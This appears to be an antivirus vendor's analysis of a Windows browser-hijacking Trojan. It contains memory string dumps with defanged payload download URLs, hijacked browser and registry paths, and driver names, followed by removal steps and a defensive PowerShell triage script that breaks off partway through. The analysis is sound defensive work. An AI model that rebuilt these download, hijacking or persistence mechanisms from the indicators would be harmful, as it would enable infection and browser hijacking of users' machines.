Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s$''%s'' is not a valid component name
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
hXXp://VVV.5636.com

ICZM.exe_1388_rwx_016D1000_0000D000:

kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
hXXp://VVV.go890.com/d/Client.dll
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
GetCPInfo
URLMON.DLL
URLDownloadToFileA
KWindows
UrlMon
Invalid variant operation
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation

ICZM.exe_1388_rwx_016DF000_00002000:

kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
URLMON.DLL
URLDownloadToFileA
[pcedur%s
.tDLLj

ICZM.exe_1388_rwx_016F0000_00002000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

ICZM.exe_1388_rwx_01C90000_00003000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

ICZM.exe_1388_rwx_027B1000_0018D000:

kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
PSAPI.dll
ole32.dll
Uh-R}
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port@
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
Port
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdStrings.pas
TIdTCPServer
IdTCPServer
CmdDelimiter
TIdTCPServerConnection
DefaultPort06~
OnExecutel
EIdTCPServerError
EIdNoExecuteSpecified
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPassword@
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponset
TIdHTTPRequest
TIdHTTPRequest,
TIdHTTPProtocol@
TIdCustomHTTP
TIdCustomHTTP@
TIdHTTP(
TIdHTTPp
HTTPOptions
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
OnKeyDown4y
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeys
AutoHotkeys(
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
olepro32.dll
IWebBrowser
IWebBrowserApp0
IWebBrowser2d
bstrUrlContext
bstrUrl
#TInternetExplorerWindowSetResizable
TInternetExplorerWindowSetLeft
TInternetExplorerWindowSetTop
TInternetExplorerWindowSetWidth
TInternetExplorerWindowSetHeight
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTop\
OnWindowSetWidth
OnWindowSetHeight
\DLL\SHDocVw.pas
DefaultInterface is NULL. Component is not connected to Server. You must call 'Connect' or 'ConnectTo' before this operation
TIdUDPBase
IdUDPBase
TUDPReadEvent
TIdUDPListenerThread
TIdUDPServer
IdUDPServer
DefaultPort
OnUDPRead
1.2.8
"TProcess_WinProc_WinHWND_Operating
TMyBrowserCheckOpenUrl
TMyCheckOpenUrl
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
Software\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\
YY.exe
LolClient.exe
winloader.exe
Droid4xSW.exe
MobileSimulate.exe
MONIwan.exe
AndroidEmulator.exe
Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\baidu.com
WS2_32.dll
DNSAPI.dll
iexplore.exe
iexplora.exe
Chrome.exe
f1browser.exe
360se.exe
360chrome.exe
360sa.exe
360chroma.exe
SogouExplorer.exe
UCBrowser.exe
windows\system32\svchost.exe
\Windows\SysWOW64\svchost.exe
<meta http-equiv="Content-Type" content="text/html;charset=gb2312">
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
explorer.exe
svchost.exe
dwm.exe
taskeng.exe
lsm.exe
wininit.exe
conhost.exe
spoolsv.exe
taskhost.exe
ntdll.dll
ADVAPI32.dll
RPCRT4.dll
Secur32.dll
USER32.dll
GDI32.dll
msvcrt.dll
SHLWAPI.dll
SHELL32.dll
iertutil.dll
urlmon.dll
OLEAUT32.dll
IMM32.DLL
LPK.DLL
USP10.dll
IEFRAME.dll
WININET.dll
Normaliz.dll
ws2_32.dll
WS2HELP.dll
VERSION.dll
mswsock.dll
iphlpapi.dll
comdlg32.dll
rasadhlp.dll
MSCTF.dll
xpsp2res.dll
appHelp.dll
CLBCATQ.DLL
COMRes.dll
RASAPI32.dll
rasman.dll
NETAPI32.dll
TAPI32.dll
rtutils.dll
WINMM.dll
USERENV.dll
msv1_0.dll
cryptdll.dll
sensapi.dll
msctfime.ime
IEUI.dll
MSIMG32.dll
msimtf.dll
psapi.dll
SETUPAPI.dll
cscui.dll
CSCDLL.dll
oleacc.dll
xmllite.dll
msfeeds.dll
hnetcfg.dll
wshtcpip.dll
MLANG.dll
SXS.DLL
actxprxy.dll
rsaenh.dll
mshtml.dll
msls31.dll
iepeers.dll
WINSPOOL.DRV
ImgUtil.dll
pngfilt.dll
Dxtrans.dll
ATL.DLL
ddrawex.dll
DDRAW.dll
DCIMAN32.dll
Dxtmsft.dll
jscript.dll
msxml3.dll
CRYPT32.dll
MSASN1.dll
%Program Files%\Internet Explorer\xpshims.dll
%Program Files%\Internet Explorer\ieproxy.dll
Open Url:
DNF.exe
Client.exe
Launcher.exe
QQ.exe
WP....OK
WP....ERROR
UrlAD:
VVV.baidu.com/s?
Get url Err...
Windows NT\Accessories\
acLuaua.dll
HintSock.dll
sogou.com
VVV.sogou.com/index.htm?pid=
http:
except..BHO
%System%\BBN.dll
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\Toolbar\WebBrowser
except..Stop
-AAB6-4EFB-8BD1-
UpdateEXEPath
1.0.6.75
RestoreTCP
C:\Windows\sysnative\drivers\kWppProxy.sys
hXXps://VVV.baidu.com/index.php?tn=76035124_3_pg
VVV.baidu.com/index.php?tn=4
VVV.baidu.com/index.php?tn=98012088_dg
VVV.baidu.com/index.php?tn=02049043_32_pg
123.sogou.com/?
VVV.sogou.com
VVV.2345.com/
VVV.hao774.com/
/pos.baidu.com/
VVV.so.com/link?
a1.alicdn.com
/i/blank.png
192.168.
msdialg100_D.dll
UDO.EXE
IPROTECT.EXE
DIC...WAE
BarClient.exe
BarClientView.exe
\drivers\qmtgpnetflow764.sys
\system32\ntoskrnl.exe
\kavbootc64.sys
drivers\nvlddmkm.sys
\drivers\stpdrive.sys
\drivers\tesmon.sys
90150-00003
hXXp://dwz.cn/
hXXp://t.cn/
/static.lz.topfreeweb.net
VVV.ra2ol.com/client
doutray.pdb;
2345WebProtect
IEOPTimize.dll;swaddresbar.dll;swntrace.dll;c_2987.nls;ilovehint2.dll;orient.dll;ilovehint.dll;
snqu_proxy_X64.pdb;BACK.pdb;
MainProX.exe*5C9389C539DDEAFFA58BF110B8ED8F03
rmserver.exe
exploren.exe
lexplore.exe
fbrowser.exe
qqbrowse.exe
360chrom.exe
TaBrowse.exe
Explore.exe
taskmgr.exe
tasklis.exe
Service.exe
NOTEPAD.EXE
control.exe
clipbrd.exe
command.com
comhost.exe
comtrol.exe
taskmur.exe
Explone.exe
Servlce.exe
contool.exe
connost.exe
fbrowse.exe
Browser.exe
Firefox.exe
lsans.exe
cacis.exe
clsvc.exe
netst.exe
xuean.exe
Brows.exe
Sogou.exe
lleba.exe
Chrom.exe
baidubrowser.exe
2345Explorer.exe
liebao.exe
Maxthon.exe
TheWorld.exe
TaoBrowser.exe
7chrome.exe
qqbrowser.exe
FastIE.exe
Juzi.exe
115Chrome.exe
opera.exe
2345chrome.exe
FHBrowser.exe
ADSafeSe.exe
350chrome.exe
ttraveler.exe
twchrome.exe
Ruiying.exe
SaaYaa.exe
MiniIE.EXE
C:\Windows\system32\winlogon.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\SysWOW64\wxpolice64.dll
C:\Windows\Explorer.EXE
C:\Windows\system32\SHELL32.dll
C:\Windows\system32\SHLWAPI.dll
C:\Windows\system32\fxsst.dll
C:\Windows\system32\msvcrt.dll
C:\Windows\System32\MMDevApi.dll
C:\Windows\system32\WINMM.dll
C:\Windows\system32\UIAutomationCore.dll
{C6CBEC98-70B9-4991-8CE5-5D846D28740C}
{60853F8B-2218-49CF-A58D-2561B9550406}
drvinst.exe
difx64.exe
.dll,Ext_RunDLL
.dll, RunIt
rundll32.exe
%s [%8X][%d]
dllhost.exe
*.dll
844D7191-2FEF-4d2b-AB06-718517B0BFC5
360Chrome\Chrome\
AppData\Local\360Chrome\Chrome\User Data\Default\Extensions\
pWin7Server.exe
JXClint.exe
yebarclient.exe
rwyNCMc.exe
TMyIdTCPServerEventCalllv
TMyIdUDPServerEventCallU
NTDLL.DLL
.hao123.com
123.sogou.com
VVV.baidu.com/
123abc.dll
lass.exe
fash.exe
txupd.exe
PPAP.EXE
TENCENTDL.EXE
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
internet explorer\iexplore.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360se6.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360chrome.exe
360Chrome\Chrome\Application\
%d.%d.%d.%d
hXXp://VVV.ip.cn/
KERNEL32.DLL
CacheIE\Content.IE5
Content.IE5
SogouExplorer\Webkit\Default\
Google\Chrome\
Opera\Opera\
application_cache\cache_groups.xml
Mozilla\Firefox\Profiles\
AppData\Local\Microsoft\Windows\
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
SetRegKey Error:
*.lnk
*.url
inflate 1.2.8 Copyright 1995-2013 Mark Adler
C:\LOG1.txt
2017-10-06
17:46:23
1iu2.iu
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegQueryInfoKeyA
RegNotifyChangeKeyValue
RegFlushKey
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetProcessHeap
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
GetProcessHandleCount
shell32.dll
ShellExecuteA
SHFileOperationA
wininet.dll
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
URLMON.DLL
UrlMkGetSessionOption
ADVAPI32.DLL
wsock32.dll
Rpcrt4.dll
OLEACC.DLL
KWindows
UrlMon
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
MyHTTPSProxyRF
IdUDPClient
website
License information for %s not found. You cannot use this control in design mode
Unable to retrieve a pointer to a running object registered with OLE for %s/%s
Instruction TLB, 4Kb pages, 4-way set associative, 32 entries
Instruction TLB, 4Mb pages, fully associative, 2 entries
Data TLB, 4Kb pages, 4-way set associative, 64 entries
Data TLB, 4Mb pages, 4-way set associative, 8 entries
8KB instruction cache, 4-way set associative, 32 byte line size
16KB instruction cache, 4-way set associative, 32 byte line size
8KB data cache 2-way set associative, 32 byte line size
16KB data cache, 4-way set associative, 32 byte line size
No help keyword specified.
OLE control activation failed
Could not obtain OLE control window handle
License information for %s is invalid
Alt
Clipboard does not support Icons
Menu '%s' is already being used by another form
No help found for %s
No context-sensitive help installed
No topic-based help system installed
Error creating window class
Cannot focus a disabled or invisible window
Control '%s' has no parent window
SSL status: "%s"
Metafile is not valid
Cannot change the size of an icon
Invalid operation on TOleGraphic
Unsupported clipboard format
Command not supported.
Address type not supported.
Error accepting connection with SSL.
Error creating SSL context.
Could not load root certificate.
Could not load certificate.
Could not load key, check password.
Request rejected or failed.
Request rejected because SOCKS server cannot connect.
Request rejected because the client program and identd report different user-ids.
Socket type not supported.
Operation not supported on socket.
Protocol family not supported.
Address family not supported by protocol family.
Socket is not connected.
Cannot send or receive after socket is closed.
Too many references, cannot splice.
%s is not a valid IP address.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
No command handler found.
Error on call Winsock2 library function %s
Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk Started
This authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
File "%s" not found
Only one TIdAntiFreeze can exist per application.
No execute handler found.
No data to read.
Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
%s.Seek not implemented
Operation not allowed on sorted list
%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
OLE error %.8x
Method '%s' not supported by automation object
Variant does not reference an automation object
Dispatch methods do not support more than 64 parameters
Connection Closed Gracefully.
Could not bind socket. Address and port are already in use.
'%s' is an invalid mask at (%d)
''%s'' is not a valid component name
Invalid data type for '%s'
List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range
Can't write to a read-only resource stream
CheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists
List does not allow duplicates ($0%x)
A component named %s already exists
String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

ICZM.exe_1388_rwx_0293F000_00003000:

<requestedExecutionLevel level="requireAdministrator"/>
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
version.dll
gdi32.dll
ole32.dll
ntdll.dll
comctl32.dll
shell32.dll
ShellExecuteA
wininet.dll
FindNextUrlCacheEntryA
URLMON.DLL
UrlMkGetSessionOption
wsock32.dll
psapi.dll
Rpcrt4.dll
OLEACC.DLL

ICZM.exe_1388_rwx_6F1D1000_00037000:

GetProcessWindowStation
RtlCreateRegistryKey
C:\Windows\system32\AdN\ICZM.exe
GetProcessHeap
GetCPInfo
.text
`.rdata
@.data
.rsrc
@.reloc
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
\DosDevices\%s
\Registry\Machine\System\CurrentControlSet\Services\%s
\??\%s
%s\%s
kernel32.dll
W%s\%x
ntdll.dll
\\.\%s
%s.bak
\\.\ROkJy7CFKib

SearchProtocolHost.exe_1672:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_2632:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:2748
    ICZM.exe:1388 (the process the Trojan injects its code into, and the one that performed the file-system changes listed in the Summary)

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Windows\System32\581eb\CDClient_EX.sys (117 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\tAKAXflCv.dll (35264 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\pppHBGDF.tmp (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\DAIwGxI.dll (213 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\BqwFFmwC.dll (270 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\275130\4BFD7.txt (155 bytes)
    C:\LOG1.txt (1536 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (290 bytes)
    C:\Windows\System32\CDCLOG.txt (428 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\Client[1].dll (81472 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\System32\4BFD7.dat (4 bytes)
    C:\Windows\System32\AdN\ICZM.exe (1448729 bytes)
    C:\Windows\System32\AdN\配置.txt (21 bytes; the GBK-encoded file name appears as ÅäÖÃ.txt when the listing is read as Latin-1)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
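The manual steps above translate directly into a host sweep. The PowerShell script below is an added example written for this page; it is not part of the Lavasoft report or its tooling. It assumes an elevated Windows PowerShell 5.1 session on the suspect machine, treats the sandbox-specific Firefox profile name (5a2ce8gs.default) and Temp sub-folder (275130) as wildcards because they differ per victim, and uses the Windows 7 Temporary Internet Files location the analysis ran on. It checks the dropped file paths, hashes any hits against the report's SHA256, looks for the injected ICZM.exe host process, and scans the Services hive for anything registering the dropped CDClient_EX.sys (the ICZM.exe dump carries the \Registry\Machine\System\CurrentControlSet\Services\%s and \DosDevices\%s format strings a driver loader would use). Only the original 838144-byte dropper can match the published hash; ICZM.exe (1448729 bytes) is a different file, so it is reported by path rather than by hash.

```powershell
# Host triage for the artifacts in this report (added example, not the report's own code).
# Assumptions: elevated Windows PowerShell 5.1; per-victim folder names are wildcarded;
# IE cache path is the Windows 7 one used in the analysis environment.

$ReportSha256 = '46d60ad45117a8d849681a4eb96cf1992d44f84bd37a444ce4d032795bd7d71d'
$ReportMd5    = '06349e57f9fa8822f9686a8b25b38d21'

# Wildcard patterns built from the "Delete or disinfect" list. Backticks escape the literal
# brackets in Client[1].dll so Get-ChildItem does not read them as a character class.
$ArtifactPatterns = @(
    (Join-Path $env:SystemRoot 'System32\AdN\*'),                  # ICZM.exe and the GBK-named .txt
    (Join-Path $env:SystemRoot 'System32\581eb\CDClient_EX.sys'),
    (Join-Path $env:SystemRoot 'System32\CDCLOG.txt'),
    (Join-Path $env:SystemRoot 'System32\4BFD7.dat'),
    'C:\LOG1.txt',
    (Join-Path $env:LOCALAPPDATA 'Temp\*\tAKAXflCv.dll'),
    (Join-Path $env:LOCALAPPDATA 'Temp\*\DAIwGxI.dll'),
    (Join-Path $env:LOCALAPPDATA 'Temp\*\BqwFFmwC.dll'),
    (Join-Path $env:LOCALAPPDATA 'Temp\*\pppHBGDF.tmp'),
    (Join-Path $env:LOCALAPPDATA 'Temp\*\4BFD7.txt'),
    (Join-Path $env:LOCALAPPDATA 'Microsoft\Windows\Temporary Internet Files\Content.IE5\*\Client`[1`].dll')
)

function Find-ReportFiles {
    # Every existing file matching a listed path, with its SHA256 compared to the dropper's.
    foreach ($pattern in $ArtifactPatterns) {
        Get-ChildItem -Path $pattern -Force -File -ErrorAction SilentlyContinue | ForEach-Object {
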